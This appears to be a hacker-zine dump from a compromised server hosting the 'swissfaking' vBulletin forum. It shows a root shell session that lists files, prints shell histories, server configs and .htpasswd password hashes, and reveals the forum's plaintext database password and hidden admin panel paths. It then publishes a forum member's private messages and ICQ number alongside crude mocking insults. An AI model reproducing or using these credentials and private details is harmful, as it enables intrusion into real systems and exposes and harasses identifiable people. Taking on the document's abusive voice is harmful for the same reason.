-rw-r--r-- 1 root root 2853622 May 3 2010 lsws-4.0.14-ent-i386-linux.tar.gz
drwxr-xr-x 8 1000 1000 4096 Oct 24 17:49 nginx-0.8.53
-rw-r--r-- 1 root root 649835 Oct 18 12:03 nginx-0.8.53.tar.gz
# cat .bash_history
top
/etc/init.d/kloxo restart
df
cd /home
ls
cd sw*
ls
cd __*
ls
ls -lah
rm -rf *
df -h
top
/usr/local/ddos/ddos.sh
ls
rm -rf *
top
ps aux
ls
rm -rf *
/usr/local/ddos/ddos.sh
vi /usr/local/ddos/ddos.conf
rm -rf *
/usr/local/ddos/ddos.sh
df -h
iptables -L
exit
snmpwalk -c public -v 1 localhost .1.3.6.1.4.1.22253.200
ps -ef | grep snmp
more /etc/snmp/snmpd.conf
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.200
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.100
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.101
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.201
vi /etc/snmp/snmpd.conf
service snmpd restart
snmpwalk -c public -v 1 localhost .1.3.6.1.4.1.22253.201
vi /etc/snmp/snmpd.conf
service snmpd restart
snmpwalk -c public -v 1 localhost .1.3.6.1.4.1.22253.101
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.101
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.102
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.103
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.1043
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.1053
snmpwalk -c public -v 1 localhost .1.3.6.1.4.1.22253.100
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.100
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.100.1
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.100.2
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.106
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.107
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.105
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.104
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.112
# cat .mysql_history
select * from ipaddress;
# cat /etc/snmp/snmpd.conf
rocommunity swissvps
pass .1.3.6.1.4.1.22253 /usr/bin/php /usr/local/lsws/add-ons/snmp_monitoring/sample.php
# cd /home
# ls -la
total 52
drwxr-xr-x 13 root root 4096 Mar 27 2010 .
drwxr-xr-x 24 root root 4096 Dec 30 14:33 ..
drwxr-xr-x 2 root root 4096 May 13 2009 admin
drwx------ 2 axfrdns axfrdns 4096 May 14 2009 axfrdns
drwx------ 2 dnscache dnscache 4096 May 14 2009 dnscache
drwx------ 2 dnslog dnslog 4096 May 14 2009 dnslog
drwxr-xr-x 3 root root 4096 Mar 27 2010 httpd
drwxr-xr-x 7 root root 4096 Jun 9 2010 kloxo
drwxr-xr-x 3 root root 4096 May 13 2009 lxadmin
drwx------ 2 lxlabs lxlabs 4096 May 13 2009 lxlabs
drwx------ 2 nouser nogroup 4096 May 13 2009 nouser
drwxr-x--- 5 swissfaking apache 4096 Jun 19 2010 swissfaking
drwx------ 2 tinydns tinydns 4096 May 14 2009 tinydns
# cd swissfaking/public_html/ && ls -la
total 408
drwxr-xr-x 6 swissfaking swissfaking 4096 Dec 31 18:47 .
drwxr-x--- 5 swissfaking apache 4096 Jun 19 2010 ..
-rw-r--r-- 1 swissfaking swissfaking 232 Oct 24 13:56 .htaccess2foo
-rw-r--r-- 1 swissfaking swissfaking 39 Oct 24 13:56 .htpasswd
drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 board
-rw-r--r-- 1 swissfaking swissfaking 1208 Mar 27 2010 brushed.jpg
drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 27 2010 cgi-bin
-rw-r--r-- 1 swissfaking swissfaking 4286 Mar 27 2010 favicon.gif
drwxr-xr-x 2 swissfaking swissfaking 4096 Jun 21 2010 images
-rw-r--r-- 1 swissfaking swissfaking 599 Oct 24 11:41 index.html
-rw-r--r-- 1 swissfaking swissfaking 1099 Aug 9 23:48 index.html.old
-rwxr-xr-x 1 swissfaking swissfaking 2221 Apr 23 2010 index2.html
-rw-r--r-- 1 swissfaking swissfaking 45132 Apr 9 2010 neverdie.jpg
drwxr-xr-x 21 swissfaking swissfaking 4096 Oct 10 14:35 sfvb4__blocked
-rw-r--r-- 1 swissfaking swissfaking 303581 Dec 31 18:47 swiss2011.png
# #mad ddos protection ahead
# cat .htaccess2foo .htpasswd
#RewriteEngine on
#RewriteRule ^index\.php$ cookie.html
AuthUserFile /home/swissfaking/swissfaking.net/.htpasswd
AuthGroupFile /dev/null
AuthName "User: 1 Passwort: 1"
AuthType Basic
<limit GET POST>
require valid-user
</limit>
1:$1$VuIT5qnw$SD8.UzvKgXUwoufPSiaR/.
# cd board && ls -la
total 2416
drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 .
drwxr-xr-x 6 swissfaking swissfaking 4096 Dec 31 18:47 ..
-rw-r--r-- 1 swissfaking swissfaking 238 Oct 24 13:33 .htaccess22foo
-rw-r--r-- 1 swissfaking swissfaking 39 Oct 24 13:33 .htpasswd
-rw-r--r-- 1 swissfaking swissfaking 23823 Mar 26 2010 ajax.php
-rw-r--r-- 1 swissfaking swissfaking 75490 Mar 26 2010 album.php
-rw-r--r-- 1 swissfaking swissfaking 17119 Mar 26 2010 announcement.php
drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 archive
-rw-r--r-- 1 swissfaking swissfaking 18288 Mar 26 2010 attachment.php
-rw-r--r-- 1 swissfaking swissfaking 35093 Apr 14 2010 banned.jpg
drwxr-xr-x 2 swissfaking swissfaking 4096 Nov 17 21:25 banners
-rw-r--r-- 1 swissfaking swissfaking 75309 Mar 26 2010 calendar.php
-rw-r--r-- 1 swissfaking swissfaking 43 Mar 26 2010 clear.gif
drwxr-xr-x 5 swissfaking swissfaking 4096 Jan 2 16:30 clientscript
-rw-r--r-- 1 swissfaking swissfaking 15346 Mar 26 2010 converse.php
-rw-r--r-- 1 swissfaking swissfaking 555 Oct 24 13:33 cookie.html
drwxr-xr-x 8 swissfaking swissfaking 4096 May 7 2010 cpstyles
-rw-r--r-- 1 swissfaking swissfaking 49309 May 19 2010 credits.php
-rw-r--r-- 1 swissfaking swissfaking 3299 Mar 26 2010 cron.php
drwxr-xr-x 3 swissfaking swissfaking 4096 Mar 26 2010 customavatars
drwxr-xr-x 3 swissfaking swissfaking 4096 Mar 26 2010 customgroupicons
drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 customprofilepics
-rw-r--r-- 1 swissfaking swissfaking 47736 Mar 26 2010 editpost.php
-rw-r--r-- 1 swissfaking swissfaking 29479 Mar 26 2010 external.php
drwxr-xr-x 2 swissfaking swissfaking 4096 Jan 4 22:35 falloutadm
-rw-r--r-- 1 swissfaking swissfaking 9765 Mar 26 2010 faq2.phpoldold
-rw-r--r-- 1 swissfaking swissfaking 4286 Mar 26 2010 favicon.gif
-rw-r--r-- 1 swissfaking swissfaking 35640 Mar 26 2010 forumdisplay.php
-rw-r--r-- 1 swissfaking swissfaking 39820 Mar 26 2010 global.php
-rw-r--r-- 1 swissfaking swissfaking 137864 Mar 26 2010 group.php
-rw-r--r-- 1 swissfaking swissfaking 24898 Mar 26 2010 group_inlinemod.php
-rw-r--r-- 1 swissfaking swissfaking 10816 Mar 26 2010 groupsubscription.php
-rw-r--r-- 1 swissfaking swissfaking 9026 Mar 26 2010 image.php
drwxr-xr-x 21 swissfaking swissfaking 4096 Oct 31 22:09 images
drwxr-xr-x 2 swissfaking swissfaking 4096 Apr 9 2010 img
drwxr-xr-x 7 swissfaking swissfaking 12288 Jan 2 22:12 includes
-rw-r--r-- 1 swissfaking swissfaking 19575 Nov 27 04:26 index.php
drwxr-xr-x 6 swissfaking swissfaking 4096 Mar 26 2010 infernoshout
-rw-r--r-- 1 swissfaking swissfaking 11083 Mar 26 2010 infernoshout.php
-rw-r--r-- 1 swissfaking swissfaking 43808 Mar 26 2010 infraction.php
-rw-r--r-- 1 swissfaking swissfaking 182738 Mar 26 2010 inlinemod.php
-rw-r--r-- 1 swissfaking swissfaking 5850 Mar 26 2010 itrader.php
-rw-r--r-- 1 swissfaking swissfaking 11784 Mar 26 2010 itrader_detail.php
-rw-r--r-- 1 swissfaking swissfaking 11841 Mar 26 2010 itrader_feedback.php
-rw-r--r-- 1 swissfaking swissfaking 1401 Mar 26 2010 itrader_global.php
-rw-r--r-- 1 swissfaking swissfaking 19557 Mar 26 2010 itrader_main.php
-rw-r--r-- 1 swissfaking swissfaking 3570 Mar 26 2010 itrader_report.php
drwxr-xr-x 2 swissfaking swissfaking 4096 Oct 10 19:11 jabber
-rw-r--r-- 1 swissfaking swissfaking 10321 Mar 26 2010 joinrequests.php
-rw-r--r-- 1 swissfaking swissfaking 10201 Mar 26 2010 login.php
-rw-r--r-- 1 swissfaking swissfaking 17048 Mar 26 2010 member.php
-rw-r--r-- 1 swissfaking swissfaking 15910 Mar 26 2010 member_inlinemod.php
-rw-r--r-- 1 swissfaking swissfaking 35880 Mar 26 2010 memberlist.php
-rw-r--r-- 1 swissfaking swissfaking 23846 Mar 26 2010 misc.php
-rw-r--r-- 1 swissfaking swissfaking 63310 Mar 26 2010 moderation.php
-rw-r--r-- 1 swissfaking swissfaking 6735 Mar 26 2010 moderator.php
-rw-r--r-- 1 swissfaking swissfaking 18456 Mar 26 2010 newattachment.php
-rw-r--r-- 1 swissfaking swissfaking 37083 Mar 26 2010 newreply.php
-rw-r--r-- 1 swissfaking swissfaking 18890 Mar 26 2010 newthread.php
-rw-r--r-- 1 swissfaking swissfaking 19583 Mar 26 2010 online.php
-rw-r--r-- 1 swissfaking swissfaking 7675 Mar 26 2010 payment_gateway.php
-rw-r--r-- 1 swissfaking swissfaking 11889 Mar 26 2010 payments.php
-rw-r--r-- 1 swissfaking swissfaking 7868 Mar 26 2010 picture.php
-rw-r--r-- 1 swissfaking swissfaking 22022 Mar 26 2010 picture_inlinemod.php
-rw-r--r-- 1 swissfaking swissfaking 25293 Mar 26 2010 picturecomment.php
drwxr-xr-x 2 swissfaking swissfaking 4096 May 19 2010 plugins
-rw-r--r-- 1 swissfaking swissfaking 27394 Mar 26 2010 poll.php
drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 polls
-rw-r--r-- 1 swissfaking swissfaking 9491 Mar 26 2010 posthistory.php
-rw-r--r-- 1 swissfaking swissfaking 75622 Jul 17 20:16 postings.php
-rw-r--r-- 1 swissfaking swissfaking 6573 Mar 26 2010 printthread.php
-rw-r--r-- 1 swissfaking swissfaking 70727 Mar 26 2010 private.php
-rw-r--r-- 1 swissfaking swissfaking 152315 Mar 26 2010 profile.php
-rw-r--r-- 1 swissfaking swissfaking 555 Mar 26 2010 quickpreview.php
-rw-r--r-- 1 swissfaking swissfaking 39730 Mar 26 2010 register.php
-rw-r--r-- 1 swissfaking swissfaking 5667 Mar 26 2010 report.php
-rw-r--r-- 1 swissfaking swissfaking 13699 Mar 26 2010 reputation.php
drwxr-xr-x 2 swissfaking swissfaking 4096 Nov 30 01:07 runnerzzzmod
-rw-r--r-- 1 swissfaking swissfaking 128640 May 6 2010 search.php
-rw-r--r-- 1 swissfaking swissfaking 20673 Mar 26 2010 sendmessage.php
-rw-r--r-- 1 swissfaking swissfaking 9988 Mar 26 2010 showgroups.php
-rw-r--r-- 1 swissfaking swissfaking 11353 Mar 26 2010 showpost.php
-rw-r--r-- 1 swissfaking swissfaking 73449 Mar 26 2010 showthread.php
drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 signaturepics
-rw-r--r-- 1 swissfaking swissfaking 47803 Mar 26 2010 statistics__blocked_.php
drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 statsmod___blocked_
-rw-r--r-- 1 swissfaking swissfaking 32827 Mar 26 2010 subscription.php
-rw-r--r-- 1 swissfaking swissfaking 2091 Mar 26 2010 swisss.php
-rw-r--r-- 1 swissfaking swissfaking 13344 Mar 26 2010 tags.php
-rw-r--r-- 1 swissfaking swissfaking 8671 Mar 26 2010 threadrate.php
-rw-r--r-- 1 swissfaking swissfaking 12394 Mar 26 2010 threadtag.php
-rw-r--r-- 1 swissfaking swissfaking 34494 Mar 26 2010 usercp.php
-rw-r--r-- 1 swissfaking swissfaking 19077 Mar 26 2010 usernote.php
-rw-r--r-- 1 swissfaking swissfaking 27339 Mar 26 2010 visitormessage.php
drwxr-xr-x 5 swissfaking swissfaking 4096 Mar 26 2010 vmoods
drwxr-xr-x 13 swissfaking swissfaking 4096 Mar 26 2010 zseries_red
drwxr-xr-x 3 swissfaking swissfaking 4096 Jan 3 22:52 zxpwmvprzzugrzms
# cat includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.8.4
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ©2000-2009 Jelsoft Enterprises Ltd. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/
/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to |
| MySQL, you will need to email your webhost because we |
| cannot tell you the correct values for the variables |
| in this file. |
\*-------------------------------------------------------*/
// ****** DATABASE TYPE ******
// This is the type of the database server on which your vBulletin database will be located.
// Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+
// for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';
// ****** DATABASE NAME ******
// This is the name of the database where your vBulletin will be located.
// This must be created by your webhost.
$config['Database']['dbname'] = 'swissfak_abc';
// ****** TABLE PREFIX ******
// Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = 'zzg';
// ****** TECHNICAL EMAIL ADDRESS ******
// If any database errors occur, they will be emailed to the address specified here.
// Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = '';
// ****** FORCE EMPTY SQL MODE ******
// New versions of MySQL (4.1+) have introduced some behaviors that are
// incompatible with vBulletin. Setting this value to "true" disables those
// behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;
// ****** MASTER DATABASE SERVER NAME AND PORT ******
// This is the hostname or IP address and port of the database server.
// If you are unsure of what to put here, leave the default values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;
// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = 'swissfak_abc';
$config['MasterServer']['password'] = 'Pk56ZuV4TfXX87B4gZ';
// ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
// This option allows you to turn persistent connections to MySQL on or off.
// The difference in performance is negligible for all but the largest boards.
// If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;
// ****** SLAVE DATABASE CONFIGURATION ******
// If you have multiple database backends, this is the information for your slave
// server. If you are not 100% sure you need to fill in this information,
// do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;
// ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
// This setting allows you to change the name of the folders that the admin and
// moderator control panels reside in. You may wish to do this for security purposes.
// Please note that if you change the name of the directory here, you will still need
// to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'falloutadm';
$config['Misc']['modcpdir'] = 'runnerzzzmod';
// Prefix that all vBulletin cookies will have
// Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'bb';
// ******** FULL PATH TO FORUMS DIRECTORY ******
// On a few systems it may be necessary to input the full path to your forums directory
// for vBulletin to function normally. You can ignore this setting unless vBulletin
// tells you to fill this in. Do not include a trailing slash!
// Example Unix:
// $config['Misc']['forumpath'] = '/home/users/public_html/forums';
// Example Win32:
// $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';
// ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
// The users specified here will be allowed to view the admin log in the control panel.
// Users must be specified by *ID number* here. To obtain a user's ID number,
// view their profile via the control panel. If this is a new installation, leave
// the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '1';
// ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
// The users specified here will be allowed to remove ("prune") entries from the admin
// log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '1';
// ****** USERS WITH QUERY RUNNING PERMISSIONS ******
// The users specified here will be allowed to run queries from the control panel.
// See the above entries for more information on the format.
// Please note that the ability to run queries is quite powerful. You may wish
// to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';
// ****** UNDELETABLE / UNALTERABLE USERS ******
// The users specified here will not be deletable or alterable from the control panel by any users.
// To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '1';
// ****** SUPER ADMINISTRATORS ******
// The users specified below will have permission to access the administrator permissions
// page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1';
// ****** DATASTORE CACHE CONFIGURATION *****
// Here you can configure different methods for caching datastore items.
// vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
// vB_Datastore_APC - to use APC
// vB_Datastore_XCache - to use XCache
// vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';
// ******** DATASTORE PREFIX ******
// If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
// than one set of forums installed on your host, you *may* need to use a prefix
// so that they do not try to use the same variable within the cache.
// This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';
// It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i] = '127.0.0.1';
$config['Misc']['memcacheport'][$i] = 11211;
$config['Misc']['memcachepersistent'][$i] = true;
$config['Misc']['memcacheweight'][$i] = 1;
$config['Misc']['memcachetimeout'][$i] = 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/
// ****** The following options are only needed in special cases ******
// ****** MySQLI OPTIONS *****
// When using MySQL 4.1+, MySQLi should be used to connect to the database.
// If you need to set the default connection charset because your database
// is using a charset other than latin1, you can set the charset here.
// If you don't set the charset to be the same as your database, you
// may receive collation errors. Ignore this setting unless you
// are sure you need to use it.
// $config['Mysqli']['charset'] = 'utf8';
// Optionally, PHP can be instructed to set connection parameters by reading from the
// file named in 'ini_file'. Please use a full path to the file.
// Example:
// $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
//$config['Mysqli']['ini_file'] = '/etc/mysql/my.cnf';
// Image Processing Options
// Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;
/*======================================================================*\
|| ####################################################################
|| #
|| # CVS: $RCSfile$ - $Revision: 28757 $
|| ####################################################################
\*======================================================================*/
# #one more time
# cat .htaccess22foo .htpasswd
#RewriteEngine on
#RewriteRule ^index\.php$ cookie.html
AuthUserFile /home/swissfaking/swissfaking.net/board/.htpasswd
AuthGroupFile /dev/null
AuthName "User: 1 Passwort: 1"
AuthType Basic
<limit GET POST>
require valid-user
</limit>
1:$1$VuIT5qnw$SD8.UzvKgXUwoufPSiaR/.
# cd zxpwmvprzzugrzms && ls -la
total 2068
drwxr-xr-x 3 swissfaking swissfaking 4096 Jan 3 22:52 .
drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 ..
-rw-r--r-- 1 swissfaking swissfaking 495 Jan 3 22:38 .htaccess
-rw-r--r-- 1 swissfaking swissfaking 26 Jan 3 22:38 .htpasswd
-rw-r--r-- 1 swissfaking swissfaking 19317 Jan 3 22:52 accessmask.php
-rw-r--r-- 1 swissfaking swissfaking 39558 Jan 3 22:52 admincalendar.php
-rw-r--r-- 1 swissfaking swissfaking 49620 Jan 3 22:52 admininfraction.php
-rw-r--r-- 1 swissfaking swissfaking 19126 Jan 3 22:52 adminlog.php
-rw-r--r-- 1 swissfaking swissfaking 8125 Jan 3 22:52 adminpermissions.php
-rw-r--r-- 1 swissfaking swissfaking 25492 Jan 3 22:52 adminreputation.php
-rw-r--r-- 1 swissfaking swissfaking 32824 Jan 3 22:52 album.php
-rw-r--r-- 1 swissfaking swissfaking 12980 Jan 3 22:52 announcement.php
-rw-r--r-- 1 swissfaking swissfaking 54994 Jan 3 22:52 attachment.php
-rw-r--r-- 1 swissfaking swissfaking 12488 Jan 3 22:52 attachmentpermission.php
-rw-r--r-- 1 swissfaking swissfaking 19331 Jan 3 22:52 avatar.php
-rw-r--r-- 1 swissfaking swissfaking 16437 Jan 3 22:52 bbcode.php
-rw-r--r-- 1 swissfaking swissfaking 14758 Jan 3 22:51 bookmarksite.php
-rw-r--r-- 1 swissfaking swissfaking 12059 Jan 3 22:51 calendarpermission.php
-rw-r--r-- 1 swissfaking swissfaking 43 Jan 3 22:51 clear.gif
drwxr-xr-x 2 swissfaking swissfaking 4096 Jan 3 22:53 control_examples
-rw-r--r-- 1 swissfaking swissfaking 65076 Jan 3 22:51 credits_admin.php
-rw-r--r-- 1 swissfaking swissfaking 24025 Jan 3 22:51 cronadmin.php
-rw-r--r-- 1 swissfaking swissfaking 10710 Jan 3 22:51 cronlog.php
-rw-r--r-- 1 swissfaking swissfaking 34063 Jan 3 22:51 css.php
-rw-r--r-- 1 swissfaking swissfaking 21795 Jan 3 22:51 diagnostic.php
-rw-r--r-- 1 swissfaking swissfaking 11724 Jan 3 22:51 email.php
-rw-r--r-- 1 swissfaking swissfaking 17458 Jan 3 22:51 faq.php
-rw-r--r-- 1 swissfaking swissfaking 12143 Jan 3 22:51 force_read_thread.php
-rw-r--r-- 1 swissfaking swissfaking 30113 Jan 3 22:51 forum.php
-rw-r--r-- 1 swissfaking swissfaking 30039 Jan 3 22:51 forumpermission.php
-rw-r--r-- 1 swissfaking swissfaking 7692 Jan 3 22:51 global.php
-rw-r--r-- 1 swissfaking swissfaking 25898 Jan 3 22:51 help.php
-rw-r--r-- 1 swissfaking swissfaking 51895 Jan 3 22:51 image.php
-rw-r--r-- 1 swissfaking swissfaking 45450 Jan 3 22:51 index.php
-rw-r--r-- 1 swissfaking swissfaking 8756 Jan 3 22:51 infernoshoutlog.php
-rw-r--r-- 1 swissfaking swissfaking 3251 Jan 3 22:50 itrader_misc.php
-rw-r--r-- 1 swissfaking swissfaking 37384 Jan 3 22:50 language.php
-rw-r--r-- 1 swissfaking swissfaking 51623 Jan 3 22:50 mgc_cb_evo.php
-rw-r--r-- 1 swissfaking swissfaking 69534 Jan 3 22:50 misc.php
-rw-r--r-- 1 swissfaking swissfaking 34140 Jan 3 22:50 moderator.php
-rw-r--r-- 1 swissfaking swissfaking 16889 Jan 3 22:50 modlog.php
-rw-r--r-- 1 swissfaking swissfaking 1837 Jan 3 22:50 newsproxy.php
-rw-r--r-- 1 swissfaking swissfaking 30631 Jan 3 22:50 notice.php
-rw-r--r-- 1 swissfaking swissfaking 43202 Jan 3 22:50 options.php
-rw-r--r-- 1 swissfaking swissfaking 12026 Jan 3 22:50 passwordcheck.php
-rw-r--r-- 1 swissfaking swissfaking 62644 Jan 3 22:50 phrase.php
-rw-r--r-- 1 swissfaking swissfaking 85854 Jan 3 22:50 plugin.php
-rw-r--r-- 1 swissfaking swissfaking 33055 Jan 3 22:50 prefix.php
-rw-r--r-- 1 swissfaking swissfaking 49757 Jan 3 22:50 profilefield.php
-rw-r--r-- 1 swissfaking swissfaking 11300 Jan 3 22:49 ranks.php
-rw-r--r-- 1 swissfaking swissfaking 5696 Jan 3 22:49 read_pms_deu.php
-rw-r--r-- 1 swissfaking swissfaking 15668 Jan 3 22:49 replacement.php
-rw-r--r-- 1 swissfaking swissfaking 11004 Jan 3 22:49 resources.php
-rw-r--r-- 1 swissfaking swissfaking 30488 Jan 3 22:49 ripper.php
-rw-r--r-- 1 swissfaking swissfaking 20657 Jan 3 22:49 rssposter.php
-rw-r--r-- 1 swissfaking swissfaking 13164 Jan 3 22:49 socialgroup_icon.php
-rw-r--r-- 1 swissfaking swissfaking 17538 Jan 3 22:49 socialgroups.php
-rw-r--r-- 1 swissfaking swissfaking 11215 Jan 3 22:49 stamp.php
-rw-r--r-- 1 swissfaking swissfaking 8623 Jan 3 22:49 stats.php
-rw-r--r-- 1 swissfaking swissfaking 8170 Jan 3 22:49 subscriptionpermission.php
-rw-r--r-- 1 swissfaking swissfaking 62261 Jan 3 22:49 subscriptions.php
-rw-r--r-- 1 swissfaking swissfaking 91677 Jan 3 22:49 template.php
-rw-r--r-- 1 swissfaking swissfaking 3911 Jan 3 22:49 textarea.php
-rw-r--r-- 1 swissfaking swissfaking 58666 Jan 3 22:49 thread.php
-rw-r--r-- 1 swissfaking swissfaking 8300 Jan 3 22:49 threadfields_admin.php
-rw-r--r-- 1 swissfaking swissfaking 95176 Jan 3 22:48 user.php
-rw-r--r-- 1 swissfaking swissfaking 56136 Jan 3 22:48 usergroup.php
-rw-r--r-- 1 swissfaking swissfaking 7272 Jan 3 22:48 usertitle.php
-rw-r--r-- 1 swissfaking swissfaking 75581 Jan 3 22:48 usertools.php
-rw-r--r-- 1 swissfaking swissfaking 18753 Jan 3 22:48 verify.php
# cat .htpasswd
Fickmaus:9Zistd9IicJdY
# cd ../jabber && ls -la
total 684
drwxr-xr-x 2 swissfaking swissfaking 4096 Oct 10 19:11 .
drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 ..
-rw-r--r-- 1 swissfaking swissfaking 7948 Oct 10 18:54 AC_OETags.js
-rw-r--r-- 1 swissfaking swissfaking 629979 Oct 10 18:56 SparkWeb.swf
-rw-r--r-- 1 swissfaking swissfaking 4286 Oct 10 19:10 favicon.gif
-rw-r--r-- 1 swissfaking swissfaking 3638 Oct 10 18:54 favicon.ico
-rw-r--r-- 1 swissfaking swissfaking 1272 Oct 10 18:54 history.htm
-rw-r--r-- 1 swissfaking swissfaking 1292 Oct 10 18:54 history.js
-rw-r--r-- 1 swissfaking swissfaking 2656 Oct 10 18:54 history.swf
-rw-r--r-- 1 swissfaking swissfaking 15260 Oct 10 19:11 jabber.html
-rw-r--r-- 1 swissfaking swissfaking 2518 Oct 10 18:55 osxmousewheel.js
-rw-r--r-- 1 swissfaking swissfaking 657 Oct 10 18:55 playerProductInstall.swf
While looking through the forums we came across someone special...
________________________________________________________________________
From fred777 to Fickmaus; Subject: Mod?
Hi Ficki, ich freu mich, dass swiss wieder online ist und wollte fragen
ob ihr Unterstützung benötigt, bzw. ich würde gerne meine Hilfe anbieten..
Designen, moderieren etc.
Als Moderator würde ich wenn dann gerne die Sections:
Coding und Hacking/Cracking moderieren. Vielleicht braucht ihr aber auch
gar keine, ich dachte nur für einen guten Start ist das nicht schlecht.
Selbstverständlich werde ich auch noch einiges posten
Falls ihr mich nicht kennt, schaut mal auf
fred777.5x.to, free-hack, back2hack etc. vorbei ;)
Danke
________________________________________________________________________
From fred777 to SzeneCrasher; Subject: Hi Crasher
Jo da die ersten Mods eingestellt werden wollte ich mal fragen bezüglich
der Hacking/Coding Section.
Ich würde die gerne moderieren und euch helfen.
Das ich kein Mist mache solltest du wissen, bin schon lange im Netz
unterwegs, FH,Back2hack etc..
Solltest du Fragen haben: ICQ 390271540
Vielleicht wird das ja was, danke schonmal
________________________________________________________________________
From fred777 to erdnuss; Subject: Mod?
Ja, da nun ja auch Sections geändert worden sind und es voller wird,
wollte ich nun bei den Admins fragen wie es so ist mit den Moderatoren
in der Security/Hacking Sections.
Habe auch schon letztens Ficki gefragt, der meinte abwarten...
Es müssten z.B. aktuell einige Beiträge verschoben werden. Ich würde
gerne Moderator in dieser Section werden, darum die Frage.
Kennen könnte man mich von Back2hack und Freehack ;)
________________________________________________________________________
From fred777 to SzeneCrasher; Subject: Frage
Ich wollte mich nochmal erkundigen, wie es mit den Moderatoren aussieht,
Swiss ist ja nun voller und größer geworden. Ich kann auch nochmal eine
komplette Bewerbung abschicken wenn ihr welche sucht.
________________________________________________________________________
From fred777 to SzeneCrasher; Subject: Aussichten
Ja ich wollte mal fragen, wie es so steht, bezüglich der
Moderatorenanfrage und was die anderem Teamies gesagt haben..
Gruß _fred_
________________________________________________________________________
FUCK. Are you serious? We knew you're lame. We knew you're dying for
fame and we even knew you suck cock but we were absolutely not aware
of the extent this has come to. Are you really that desperate to
moderate a fucking preschool that you start begging for it only days
after your registration? Damnit fred, you're pretty rundown.
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| From fred777 to Fickmaus; Subject: Jabber |
| Ja ich hätte gerne einen Account, habe noch keinen. |
| Name: fred777 |
|____________________________________________________________________|
Right on cue, chap!
